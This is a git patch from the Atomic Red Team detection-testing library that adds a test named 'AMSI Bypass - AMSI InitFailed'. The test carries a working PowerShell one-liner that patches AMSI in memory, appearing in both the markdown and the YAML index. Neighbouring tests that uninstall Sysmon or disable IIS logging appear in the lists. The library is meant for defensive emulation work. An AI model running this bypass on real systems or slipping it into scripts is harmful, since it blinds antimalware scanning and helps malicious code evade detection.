From d6d68477ac8ea79f77ddb0720cdf608ce6a950ea Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Tue, 17 Sep 2019 18:33:39 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master

---
 atomics/T1089/T1089.md | 19 +++++++++++++++++++
 atomics/index.md | 1 +
 atomics/index.yaml | 9 +++++++++
 atomics/windows-index.md | 1 +
 4 files changed, 30 insertions(+)

diff --git a/atomics/T1089/T1089.md b/atomics/T1089/T1089.md
index bf556b14..26467888 100644
--- a/atomics/T1089/T1089.md
+++ b/atomics/T1089/T1089.md
@@ -24,6 +24,8 @@
 - [Atomic Test #10 - Uninstall Sysmon](#atomic-test-10---uninstall-sysmon)
+- [Atomic Test #11 - AMSI Bypass - AMSI InitFailed](#atomic-test-11---amsi-bypass---amsi-initfailed)
+
@@ -236,4 +238,21 @@ sc query sysmon > nul
 sysmon -i -accepteula
 ```
+
+
+
+## Atomic Test #11 - AMSI Bypass - AMSI InitFailed
+Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
+https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `powershell`!
+```
+[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
+```
+
+
+
diff --git a/atomics/index.md b/atomics/index.md
index 01aadace..084699e1 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -193,6 +193,7 @@
 - Atomic Test #8: Unload Sysmon Filter Driver [windows]
 - Atomic Test #9: Disable Windows IIS HTTP Logging [windows]
 - Atomic Test #10: Uninstall Sysmon [windows]
+ - Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows]
 - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/index.yaml b/atomics/index.yaml
index ca972ace..7e2ae3c6 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -6000,6 +6000,15 @@ defense-evasion:
 cleanup_command: 'sysmon -i -accepteula '
+ - name: AMSI Bypass - AMSI InitFailed
+ description: "Any easy way to bypass AMSI inspection is it patch the dll in
+ memory setting the \"amsiInitFailed\" function to true. \nhttps://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/\n"
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\n"
 T1107:
 technique:
 external_references:
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 6a31951f..a5f132cd 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -37,6 +37,7 @@
 - Atomic Test #8: Unload Sysmon Filter Driver [windows]
 - Atomic Test #9: Disable Windows IIS HTTP Logging [windows]
 - Atomic Test #10: Uninstall Sysmon [windows]
+ - Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows]
 - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)